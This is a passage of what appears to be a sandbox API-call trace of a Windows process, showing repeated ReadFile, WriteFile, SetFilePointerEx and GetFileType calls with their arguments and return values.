lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] GetFileType (hFile=0x4c) returned 0x1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] GetFileType (hFile=0x4c) returned 0x1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] GetFileType (hFile=0x4c) returned 0x1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.223] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.223] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.223] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.223] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] GetFileType (hFile=0x4c) returned 0x1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] GetFileType (hFile=0x4c) returned 0x1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] GetFileType (hFile=0x4c) returned 0x1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] GetFileType (hFile=0x4c) returned 0x1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] GetFileType (hFile=0x4c) returned 0x1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] GetFileType (hFile=0x4c) returned 0x1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] GetFileType (hFile=0x4c) returned 0x1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] GetFileType (hFile=0x4c) returned 0x1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.224] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.224] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.224] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.224] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] GetFileType (hFile=0x4c) returned 0x1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] GetFileType (hFile=0x4c) returned 0x1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] GetFileType (hFile=0x4c) returned 0x1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] GetFileType (hFile=0x4c) returned 0x1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] GetFileType (hFile=0x4c) returned 0x1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] GetFileType (hFile=0x4c) returned 0x1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] GetFileType (hFile=0x4c) returned 0x1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] GetFileType (hFile=0x4c) returned 0x1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.225] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.225] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.225] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.225] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] GetFileType (hFile=0x4c) returned 0x1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] GetFileType (hFile=0x4c) returned 0x1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] GetFileType (hFile=0x4c) returned 0x1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] GetFileType (hFile=0x4c) returned 0x1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] GetFileType (hFile=0x4c) returned 0x1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] GetFileType (hFile=0x4c) returned 0x1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] GetFileType (hFile=0x4c) returned 0x1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] GetFileType (hFile=0x4c) returned 0x1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.226] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.226] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.226] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.226] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] GetFileType (hFile=0x4c) returned 0x1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] GetFileType (hFile=0x4c) returned 0x1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] GetFileType (hFile=0x4c) returned 0x1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.227] GetFileType (hFile=0x4c) returned 0x1 [0094.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.227] GetFileType (hFile=0x4c) returned 0x1 [0094.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.227] GetFileType (hFile=0x4c) returned 0x1 [0094.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.227] GetFileType (hFile=0x4c) returned 0x1 [0094.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.227] GetFileType (hFile=0x4c) returned 0x1 [0094.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.227] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.227] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.227] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.227] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.227] GetFileType (hFile=0x4c) returned 0x1 [0094.227] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.227] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.227] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.228] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.228] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.228] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.228] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.228] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.228] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.228] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.228] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.228] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.228] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.228] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.228] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.228] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.228] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.228] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.228] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.228] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.228] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.228] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.228] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.228] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.229] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.229] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.229] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.229] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.229] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.229] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.229] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.229] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.229] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.229] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.229] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.229] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.229] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.229] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.229] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.229] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.229] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.229] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.229] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.229] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.229] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.230] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.230] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.230] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.230] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.230] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.230] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.230] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.230] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.230] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.230] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.230] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.230] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.230] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.230] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.230] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.230] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.230] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.230] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.230] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.230] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.230] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.231] SetFilePointerEx (in: hFile=0x54, 